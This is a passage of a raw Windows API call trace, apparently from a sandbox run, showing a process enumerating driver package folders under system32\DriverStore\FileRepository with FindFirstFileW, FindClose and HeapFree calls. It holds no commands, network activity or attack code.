1 [0028.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\display.inf_amd64_neutral_ea1c8215e52777a6\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a218705, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f89c6f4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f89c6f4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.398] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.398] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.398] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\divacx64.inf_amd64_neutral_fa0f82f024789743\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x397d4812, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f63b0ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f63b0ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.401] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.401] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.401] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4.inf_amd64_neutral_b89cfac15ccb2fba\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a0c1aa3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f82a2d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f82a2d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.405] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.405] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.405] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\dot4prt.inf_amd64_neutral_e7d3f62d0d4411db\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36ed0bf1, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b3d8a70, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b3d8a70, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.408] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.408] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\eaphost.inf_amd64_neutral_4506dea11740c089\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d20021d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x606e4b0e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x606e4b0e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.408] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.408] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.408] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorcertdrv.inf_amd64_neutral_2e1cecffae9c899a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3fa9d9c8, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60f5f97d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60f5f97d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.409] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.409] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.409] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ehstorpwddrv.inf_amd64_neutral_ecd233d7cabbdebf\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3dde7033, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6083b770, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6083b770, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.409] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.410] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\elxstor.inf_amd64_neutral_4263942b9dfe9077\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x420d9b6f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61bded14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61bded14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.410] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.410] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxca003.inf_amd64_neutral_5b8c7c1dda79bef4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b3a6966, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6013d6c3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6013d6c3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.413] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.414] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn001.inf_amd64_neutral_d23021a1eb548156\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b465047, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.415] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.415] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\faxcn002.inf_amd64_neutral_3d392ccc357e04db\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b4d7468, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.415] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.415] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.415] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\fdc.inf_amd64_neutral_bbcfca39fdc02275\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43a9697e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.416] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.416] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\flpydisk.inf_amd64_neutral_f54222cc59267e1e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x439d829d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x62113d3e, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x62113d3e, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.420] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.420] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\gameport.inf_amd64_neutral_fe5c4f29488f121e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e1eb55b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x608adb91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x608adb91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.420] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.420] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hal.inf_amd64_neutral_232b95977cf6d84c\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42eafb68, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61f4acbb, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61f4acbb, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.421] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.421] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw72b64.inf_amd64_neutral_023772237d3a4ade\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4656f5cd, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.423] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.423] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.423] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85b64.inf_amd64_neutral_22b436d5d06ab017\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x463803e9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65c23f8b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65c23f8b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.429] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.430] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.430] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hcw85c64.inf_amd64_neutral_96b71557b416d04a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4648ad8b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65cbc50c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65cbc50c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.431] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.432] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.432] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudbus.inf_amd64_neutral_4b99fffee061ff26\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3875ceff, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bbbb35f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bbbb35f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.433] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.433] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.433] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudio.inf_amd64_neutral_ce7bc199c85ae0a0\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x36dc624f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3b31a38f, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3b31a38f, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.433] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.433] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hdaudss.inf_amd64_neutral_330a593eb888237c\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e50b241, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6091ffb2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6091ffb2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.434] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.434] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidbth.inf_amd64_neutral_8a1323fc68ad84af\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d865d49, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607a31ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607a31ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.434] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.435] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hiddigi.inf_amd64_neutral_12aaf5742a9969da\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x43372771, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6200939c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6200939c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.435] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.435] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.435] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidir.inf_amd64_neutral_5b48c4b1b49ca54a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d604745, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.436] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.436] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.436] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidirkbd.inf_amd64_neutral_2b561a02e977e2e3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3d781508, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6077d08f, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6077d08f, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.436] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.436] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.436] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hidserv.inf_amd64_neutral_f2223e39f37c69f3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432da1f0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61fe323c, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61fe323c, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.437] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.437] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1nd.inf_amd64_neutral_cf39c48277e038de\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b549889, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60163824, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60163824, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.437] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.437] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1sd.inf_amd64_neutral_caaa16c52c48f8ac\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b5bbca9, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60189984, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60189984, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.438] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.438] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1so.inf_amd64_neutral_4f1a3f1015001339\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b65422a, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601d5c44, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601d5c44, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.438] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.438] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.438] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpoa1ss.inf_amd64_neutral_8cae09a2238d64e0\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b6c664b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x601fbda5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x601fbda5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.439] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.439] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\hpsamd.inf_amd64_neutral_84ae149ecc9f8033\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3980691d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bf011a5, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bf011a5, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.439] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.439] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.439] FindFirstFileW (in: 